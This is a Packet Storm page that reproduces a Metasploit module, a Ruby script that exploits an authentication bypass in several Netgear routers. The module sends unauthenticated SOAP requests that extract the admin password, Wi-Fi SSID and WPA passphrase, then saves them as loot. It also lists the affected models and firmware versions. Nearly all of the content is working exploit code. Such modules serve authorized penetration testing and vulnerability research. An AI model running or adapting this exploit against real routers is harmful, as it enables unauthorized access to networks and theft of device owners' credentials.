what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Netgear Unauthenticated SOAP Password Extractor

Netgear Unauthenticated SOAP Password Extractor
Posted Aug 31, 2024
Authored by h00die, Michael Messner, Peter Adkins | Site metasploit.com

This Metasploit module exploits an authentication bypass vulnerability in different Netgear devices. It allows you to extract the password for the remote management interface.

tags | exploit, remote, bypass
SHA-256 | 6ec21b301158f8e8563ec1fe1e9c6b675e162a88cdc41ce6a56f70fa586ab250

Netgear Unauthenticated SOAP Password Extractor

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report

def initialize
super(
'Name' => 'Netgear Unauthenticated SOAP Password Extractor',
'Description' => %q{
This module exploits an authentication bypass vulnerability in different Netgear devices.
It allows to extract the password for the remote management interface. This module has been
tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:
NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,
NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),
NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),
NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),
NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),
NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),
NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),
NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),
NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),
NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),
NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)
},
'References' => [
[ 'BID', '72640' ],
[ 'OSVDB', '118316' ],
[ 'URL', 'https://github.com/darkarnium/secpub/tree/master/Vulnerabilities/NetGear/SOAPWNDR' ]
],
'Author' => [
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
'h00die <mike@shorebreaksecurity.com>' # Metasploit enhancements/docs
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Feb 11 2015'
)
end

def run
print_status('Trying to access the configuration of the device')

# extract device details
action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo'
print_status('Extracting Firmware version...')
extract_data(action)

# extract credentials
action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo'
print_status('Extracting credentials...')
extract_data(action)

# extract wifi info
action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo'
print_status('Extracting Wifi...')
extract_data(action)

# extract WPA info
action = 'urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys'
print_status('Extracting WPA Keys...')
extract_data(action)
end

def extract_data(soap_action)
res = send_request_cgi({
'method' => 'POST',
'uri' => '/',
'headers' => {
'SOAPAction' => soap_action
},
'data' => '='
})

return if res.nil?
return if res.code == 404
return if res.headers['Server'].nil?
# unknown if other devices have other Server headers
return if res.headers['Server'] !~ %r{Linux/2.6.15 uhttpd/1.0.0 soap/1.0}

if res.body =~ %r{<NewPassword>(.*)</NewPassword>}
print_status('Credentials found, extracting...')
extract_credentials(res.body)
end

if res.body =~ %r{<ModelName>(.*)</ModelName>}
model_name = ::Regexp.last_match(1)
print_good("Model #{model_name} found")
end

if res.body =~ %r{<Firmwareversion>(.*)</Firmwareversion>}
firmware_version = ::Regexp.last_match(1)
print_good("Firmware version #{firmware_version} found")

# store all details as loot
loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body)
print_good("Device details downloaded to: #{loot}")
end

if res.body =~ %r{<NewSSID>(.*)</NewSSID>}
ssid = ::Regexp.last_match(1)
print_good("Wifi SSID: #{ssid}")
end

if res.body =~ %r{<NewBasicEncryptionModes>(.*)</NewBasicEncryptionModes>}
wifi_encryption = ::Regexp.last_match(1)
print_good("Wifi Encryption: #{wifi_encryption}")
end

if res.body =~ %r{<NewWPAPassphrase>(.*)</NewWPAPassphrase>}
wifi_password = ::Regexp.last_match(1)
print_good("Wifi Password: #{wifi_password}")
end
rescue ::Rex::ConnectionError
vprint_error('Failed to connect to the web server')
return
end

def extract_credentials(body)
body.each_line do |line|
next unless line =~ %r{<NewPassword>(.*)</NewPassword>}

pass = ::Regexp.last_match(1)
print_good("admin / #{pass} credentials found")

connection_details = {
module_fullname: fullname,
private_data: pass,
private_type: :password,
username: 'admin',
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_details)
create_credential_and_login(connection_details)
end

# store all details as loot
loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body)
print_good("Account details downloaded to: #{loot}")
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close